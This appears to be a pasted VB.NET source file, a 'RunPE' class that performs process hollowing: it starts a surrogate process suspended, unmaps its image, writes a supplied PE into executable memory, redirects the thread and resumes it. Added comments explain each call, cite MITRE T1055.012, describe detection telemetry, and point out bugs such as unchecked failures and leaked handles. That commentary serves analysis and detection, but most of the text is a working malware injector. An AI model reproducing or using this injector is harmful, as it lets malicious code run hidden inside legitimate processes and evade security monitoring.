
Untitled

a guest
Sep 22nd, 2017
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3.  
  ' RunPE: P/Invoke declarations plus InjectPE. InjectPE starts a surrogate process suspended,
  ' unmaps the view at the address it reads from that process, writes a caller-supplied PE into
  ' newly allocated memory there, repoints the primary thread and resumes it. This call sequence
  ' is the process-hollowing pattern (MITRE ATT&CK T1055.012).
  '
  ' Review notes (detection / triage):
  '  - Observable behaviour: a child process created with creation flag 4 (CREATE_SUSPENDED),
  '    followed by cross-process NtUnmapViewOfSection, VirtualAllocEx with protection &H40
  '    (PAGE_EXECUTE_READWRITE), WriteProcessMemory, SetThreadContext and ResumeThread against
  '    that same child. Telemetry that correlates these calls on one target process, or that
  '    compares the surrogate's in-memory image with its file on disk (e.g. Sysmon
  '    ProcessTampering, event ID 25), covers this pattern.
  '  - Every offset used in InjectPE matches the 32-bit PE32 header and x86 CONTEXT layouts;
  '    nothing in this listing handles any other layout.
  4. Public Class RunPE
  ' kernel32!CreateProcess. STARTUPINFO and PROCESS_INFORMATION are passed as untyped arrays
  ' (sInfo, pInfo) instead of declared structures. No CharSet or SetLastError is specified.
  5. <DllImport("kernel32")> _
  6. Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  7. ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  8. End Function
  ' kernel32!GetThreadContext. The CONTEXT structure is passed as a raw UInteger array.
  9. <DllImport("kernel32")> _
  10. Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  11. End Function
  ' ntdll!NtUnmapViewOfSection. The status comes back as UInteger; InjectPE treats 0 as success.
  12. <DllImport("ntdll")> _
  13. Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  14. End Function
  ' kernel32!ReadProcessMemory. bufr is ByRef IntPtr, so the bytes read land directly in the
  ' caller's IntPtr variable.
  15. <DllImport("kernel32")> _
  16. Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  17. End Function
  ' kernel32!ResumeThread.
  18. <DllImport("kernel32.dll")> _
  19. Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
  20. End Function
  ' kernel32!SetThreadContext. Takes the same raw-array CONTEXT as GetThreadContext.
  21. <DllImport("kernel32")> _
  22. Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  23. End Function
  ' kernel32!VirtualAllocEx. Allocates memory in another process.
  24. <DllImport("kernel32")> _
  25. Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  26. End Function
  ' kernel32!VirtualProtectEx. Declared but not called anywhere in this listing.
  27. <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  28. Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  29. End Function
  ' kernel32!WriteProcessMemory. lpNumberOfBytesWritten is declared ByVal Integer, so no byte
  ' count comes back to the caller; InjectPE never reads it and ignores the Boolean result.
  30. <DllImport("kernel32.dll", SetLastError:=True)> _
  31. Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
  32. End Function
  33.  
  ''' <summary>
  ''' Starts surrogateProcess suspended and replaces its mapped image with the PE held in bytes.
  ''' </summary>
  ''' <param name="bytes">Raw PE file contents. Header fields are read at fixed offsets with no null, length or signature check.</param>
  ''' <param name="surrogateProcess">Command line handed to CreateProcess for the host process.</param>
  ''' <returns>False only when an exception is caught. True on every other path, including when CreateProcess or a later native call reports failure.</returns>
  34. Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
  35. Try
  36. Dim procAttr As IntPtr = IntPtr.Zero
  ' Four pointer-sized slots standing in for PROCESS_INFORMATION: (0) is used below as the
  ' process handle and (1) as the thread handle.
  37. Dim processInfo As IntPtr() = New IntPtr(3) {}
  ' 68 zeroed bytes standing in for STARTUPINFO (VB array bounds are inclusive).
  38. Dim startupInfo As Byte() = New Byte(67) {}
  39.  
  ' PE32 header fields, read relative to e_lfanew (the Int32 at file offset 60):
  ' num2 = e_lfanew, num = NumberOfSections (PE+6), ptr4 = SizeOfHeaders (PE+&H54).
  40. Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
  41. Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
  42. Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
  43.  
  ' Creation flag 4 is CREATE_SUSPENDED: the surrogate exists but its primary thread has not run.
  44. If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
  45. procAttr, Nothing, startupInfo, processInfo) Then
  ' 179 UInteger values = 716 bytes, the size of the x86 CONTEXT. ctxt(0) is ContextFlags;
  ' &H10002 is CONTEXT_INTEGER on x86.
  46. Dim ctxt As UInteger() = New UInteger(178) {}
  47. ctxt(0) = &H10002
  48. If GetThreadContext(processInfo(1), ctxt) Then
  ' ctxt(&H29) sits at byte offset &HA4, which is Ebx in the x86 CONTEXT. Presumably this is the
  ' new process's PEB address, making +8 the PEB image-base field - TODO confirm.
  49. Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
  50.  
  51. Dim buffer__1 As IntPtr = IntPtr.Zero
  52. Dim bufferSize As New IntPtr(4)
  53.  
  54. Dim numRead As IntPtr = IntPtr.Zero
  55.  
  ' Reads 4 bytes from baseAddr in the remote process into buffer__1, then unmaps the view
  ' at that address. Both calls must succeed for the block below to run.
  56. If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
  ' addr = ImageBase (PE+&H34), size = SizeOfImage (PE+80) of the supplied PE.
  57. Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
  58. Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
  ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE: a single
  ' read/write/execute region requested at the PE's preferred base. The returned address is
  ' used below without being checked.
  59. Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)
  60.  
  61. Dim lpNumberOfBytesWritten As Integer
  62.  
  ' Copies the first SizeOfHeaders bytes (the PE headers) to the new allocation.
  63. WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
  64. Dim num5 As Integer = num - 1
  65. For i As Integer = 0 To num5
  ' One 40-byte section header, starting at PE+&HF8, read as ten Int32 values:
  ' dst(3) = VirtualAddress, dst(4) = SizeOfRawData, dst(5) = PointerToRawData.
  66. Dim dst As Integer() = New Integer(9) {}
  67. Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
  ' buffer2 holds dst(4) bytes of raw section data taken from file offset dst(5).
  68. Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
  69. Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
  70.  
  ' size and addr are reused here as the remote destination address and the byte count.
  71. size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
  72. addr = New IntPtr(buffer2.Length)
  73.  
  74. WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
  75. Next
  ' Writes the 4-byte new base address back to the location read earlier (ctxt(&H29) + 8).
  76. size = New IntPtr(ctxt(&H29) + 8L)
  77. addr = New IntPtr(4)
  78.  
  79. WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
  ' ctxt(&H2C) sits at byte offset &HB0 (Eax in the x86 CONTEXT); it is set to the new base
  ' plus AddressOfEntryPoint (PE+40) before the context is written back to the thread.
  80. ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
  81. SetThreadContext(processInfo(1), ctxt)
  82. End If
  83. End If
  ' Runs whenever CreateProcess succeeded, whether or not the steps above did.
  84. ResumeThread(processInfo(1))
  85. End If
  ' Bare Catch: every exception type is swallowed and reported only as False. Neither handle
  ' in processInfo is closed anywhere in this listing.
  86. Catch
  87. Return False
  88. End Try
  89. Return True
  90. End Function
  91.  
  ' Empty Load handler. The listing shows no Inherits clause, so the base type that would
  ' supply MyBase.Load is not visible here.
  92. Private Sub RunPE_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  93.  
  94. End Sub
  95. End Class